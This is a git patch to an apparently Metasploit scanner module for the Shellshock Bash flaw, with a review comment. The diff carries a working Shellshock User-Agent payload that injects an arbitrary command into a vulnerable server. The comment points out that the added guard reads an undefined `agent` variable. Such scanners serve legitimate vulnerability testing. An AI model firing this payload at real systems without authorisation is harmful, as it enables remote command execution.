From b1e9b3664e064628eb5998b6e6710a411101bef0 Mon Sep 17 00:00:00 2001
From: William Vu
Date: Thu, 25 Sep 2014 01:01:11 -0500
Subject: [PATCH] Improve false positive check
---
 modules/auxiliary/scanner/http/apache_mod_cgi_bash_env.rb | 5 ++++-
 1 file changed, 4 insertions(+), 1 deletion(-)
diff --git a/modules/auxiliary/scanner/http/apache_mod_cgi_bash_env.rb b/modules/auxiliary/scanner/http/apache_mod_cgi_bash_env.rb
index 45fa5ae6e0..62fded16d8 100644
--- a/modules/auxiliary/scanner/http/apache_mod_cgi_bash_env.rb
+++ b/modules/auxiliary/scanner/http/apache_mod_cgi_bash_env.rb
@@ -42,13 +42,16 @@ class Metasploit4 < Msf::Auxiliary
 def run_host(ip)
 marker = Rex::Text.rand_text_alphanumeric(rand(42) + 1)
+ user_agent = %Q{() { :; }; echo "#{marker}$(#{datastore['CMD']})#{marker}"}
 res = send_request_raw(
 'method' => datastore['METHOD'],
 'uri' => normalize_uri(target_uri.path),
- 'agent' => %Q{() { :; }; echo "#{marker}$(#{datastore['CMD']})#{marker}"}
+ 'agent' => user_agent
 )
+ return if (res && res.body.include?(agent))
+
 if res && res.body =~ /#{marker}(.+)#{marker}/m
 print_good("#{peer} - #{$1}")
 report_vuln(
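Review bot: The added guard `return if (res && res.body.include?(agent))` reads `agent`, but the local this hunk introduces is `user_agent`. Unless an `agent` method is defined outside the hunk, this raises NameError whenever a response arrives, instead of filtering reflections. It should read `return if res && res.body.include?(user_agent)`. The guard also catches only a verbatim echo of the header: a page that reflects the User-Agent HTML-escaped would presumably pass it and still satisfy the marker regex below, so a comment such as `# skips verbatim User-Agent reflection only; escaped reflections can still match the marker regex` would record that limit. run_host's body continues outside the hunk.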